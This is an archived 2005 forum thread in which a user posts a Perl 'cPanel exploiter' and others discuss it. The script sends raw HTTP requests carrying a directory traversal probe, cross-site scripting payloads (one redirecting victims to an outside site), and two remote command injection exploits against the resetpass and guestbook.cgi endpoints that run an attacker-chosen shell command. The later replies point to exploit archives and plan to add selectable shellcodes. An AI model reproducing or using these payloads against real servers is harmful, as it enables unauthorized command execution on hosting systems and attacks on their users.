Cpanel Exploiter

GovernmentSecurity.org > GSO Programming Section > Perl /CGI

shell6

Jun 25 2005, 05:09 PM

This is a little cPanel exploiter that I wrote to practice with perl. Comments?

CODE

use Socket;
use IO::Socket;

$server = "";
$sploit = "";
$cmd = "";
$server = @ARGV[ 0 ];
$sploit = @ARGV[ 1 ];
$cmd = @ARGV [ 2 ];
if($server eq "") {
usage();
}
if($sploit eq "1") {
cpanel1();
}
if($sploit eq "2") {
cpanel2();
}
if($sploit eq "3") {
cpanel3();
}
if($sploit eq "4") {
cpanel4();
}
sub usage
{
printf("\nUsage :\n");
printf("perl h4xlm_cpanel_1.pl <server> <exploit> <cmd>\n\n");
printf("The <server> should be in www.host.com format.\n");
printf("The cmd is for if you want to enter in a one word shell command.\n");
printf("You can use spaces with \%20 only. If you put in spaces, the program\n");
printf("will only send the first word.\n");
printf("Exploits:\n");
printf("1> Directory Traversal/Creation Exploit Checker (Upto v.9.1.0-EDGE 70)\n");
printf("2> Cross-site Scripting Exploit Checker (Upto v.9.1.0-R85?)\n");
printf("3> Remote Command Entry Exploit Exploiter (5.3 - 9.1?)\n");
printf("4> Guestbook.cgi Remote Command Entry Exploiter (5.0 and below)\n");
}
sub cpanel1()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /frontend/x/err/erredit.html?dir=/public_html/&file=h4xlm.txt HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
sleep(1);
printf("If sucessful, http://$server/h4xlm.txt should exist\n");
printf("if it exists, it worked.\n");
close($sock);
exit(1);
}
sub cpanel2()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /frontend/x/cpanelpro/showlog.html?account=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 1 sent ...\n");
sleep(1);
my $sock2 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock2->autoflush(1);
print $sock2 "GET /frontend/x2/net/dnslook.html?dns=</pre><script>window.location='http://www.h4xlm.net/'</script> HTTP/1.1\r\n";
printf("\nGET request 2 sent ...\n");
sleep(1);
my $sock3 = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock3->autoflush(1);
print $sock3 "GET /frontend/x2/denyip/del.html?ip=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 3 sent ...\n");
sleep(1);
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock4->autoflush(1);
print $sock4 "GET /frontend/x2/htaccess/index.html?dir=<script>alert('Vulnerable')</script> HTTP/1.1\r\n";
printf("\nGET request 4 sent ...\n");
sleep(1);
printf("If sucessful, in your browser while browsing $server you\n");
printf("should see at least one popup showing the word Vulnerable\n");
printf("and/or a popup to www.h4xlm.net\n");
close($sock);
close($sock2);
close($sock3);
close($sock4);
exit(1);
}
sub cpanel3()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /resetpass/?user=|\">$cmd\"| HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
printf("This should work. You can tell if you check yourself.\n");
sleep(1);
}
sub cpanel4()
{
my $sock = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $server,
PeerPort => "2082",
) || die("No server found under $server on http/2082");
$sock->autoflush(1);
print $sock "GET /cgi-sys/guestbook.cgi?user=cpanel&template=|$cmd| HTTP/1.1\r\n";
printf("\nGET request sent ...\n");
printf("This should work. You can tell if you check yourself.\n");
sleep(1);
}

Insanity

Jun 26 2005, 06:25 AM

I am interested in the cPanel exploit of your's . it says
cpanel1();
cpanel2();
cpanel3();
cpanel4();
implying there are 4 differne't ways to exploit it if im not mistaken

so this is just a exploit made up of older exploits but all put in one so you can try multiple exploits with just the one program..

you have the Directory Traversal/Creation Exploit Checker (Upto v.9.1.0-EDGE 70)
Cross-site Scripting Exploit Checker (Upto v.9.1.0-R85?)\n");
Remote Command Entry Exploit Exploiter (5.3 - 9.1?)\n");
Guestbook.cgi Remote Command Entry Exploiter (5.0 and below)\n");

so the guestbook.cgi and the remote command entry exploits are the actuall exploits in the program? and the creation exploit checker and teh cross site are just checkers or do i have this all wrong...

sorry its been a while since i have done programming and with that i only did c... and not perl... plus comments in the programming might be usefull as well

all good programmers use comments but ill try it out... im sure its great

shell6

Jun 26 2005, 11:10 AM

It is a multiple-exploit tool. But yeah, they are old exploits <i wrote it a long time ago

QUOTE

so the guestbook.cgi and the remote command entry exploits are the actuall exploits in the program? and the creation exploit checker and teh cross site are just checkers or do i have this all wrong...

Exactly!

Insanity

Jun 26 2005, 06:19 PM

Alright thanks for making that clear... oh well its a start , i think as you grow more knowledgeable of exploits etc you will make some sweet multiexploit idea that will rock... kinda like whoppix

shell6

Jun 26 2005, 08:40 PM

Thanx. I also do C++ but im more comfortable with perl sockets over C++ (however I am better in everything else other than sockets in C++ instead of perl for some strange reason). Give me a list of exploits and I'll make another little one of these.

Insanity

Jun 27 2005, 08:32 AM

hey, um... you could try goint to k-otik for exploits,

CODE

http://www.frsirt.com/exploits/

and just find any new xploits and make a multi tasker of those exploits... but i donno... my best advice for you is try that once or twice and then get really deep into the exploits and try to understand exactly how they work and are coded and see what they look for in the vulnerabilites, because if you can do that then you will idea's of programs taht might possible be able to be exploited, and you will be able to program your own exploits

shell6

Jun 27 2005, 08:46 AM

Great, I'll go there and securityfocus. I'll do this in a little while thou because I'm away from home.

EDIT: I got an idea! I will also supply multiple shellcodes so that you can use the shellcode of your choice from a menu. So that way you're not stuck to the shellcode that I want you to use!

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.